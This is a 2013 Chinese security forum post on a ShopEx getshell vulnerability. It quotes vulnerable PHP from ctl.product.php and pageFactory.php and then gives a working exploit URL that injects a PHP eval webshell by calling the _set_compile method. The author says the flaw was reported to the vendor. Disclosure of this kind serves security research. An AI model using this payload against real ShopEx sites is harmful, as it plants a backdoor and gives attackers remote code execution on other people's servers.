【我爱T00LS】shopex Getshell

2013-09-04 16:30:45 55 5427 2 
ctl.product.php



class ctl_product extends shopPage{



    var $_call = 'call';

    var $type = 'goods';

    var $seoTag = array('shopname','brand','goods_name','goods_cat','goods_intro','goods_brief','brand_kw','goods_kw','goods_price','update_time','goods_bn');

    function ctl_product(){

        parent::shopPage();

        $this->title    = $this->system->getConf('site.goods_title');

        $this->keywords = $this->system->getConf('site.goods_meta_key_words');

        $this->desc     = $this->system->getConf('site.goods_meta_desc');

    }



    function call(){

        $args = func_get_args();

        $action = array_shift($args);

//echo $args."||".var_dump($this);

//echo 1111;

var_dump($args);

var_dump(get_class_methods($this));

        if(method_exists($this,$action)){

            return call_user_func_array(array(&$this,$action),$args);//可以执行一些 系统自带的函数 我们找下有没可利用的

        }



pageFactory.php

 public function _set_compile( $key, &$content )//就调用这个函数 可以直接写出shell

    {

        if ( !$this->force_compile )

        {

            file_put_contents( $this->compile_dir.$key.".php", $content );

        }

    }
test
[url]http://xx.com/product-12-[/url]<script%20language="php">eval($_POST[c])%3B-_set_compile.html

已经提交官方了 估计已经修复了
类别 Web安全

关于作者

Cond0r136篇文章1277篇回复

Cond0r
55

评论55次

要评论?请先  登录  或  注册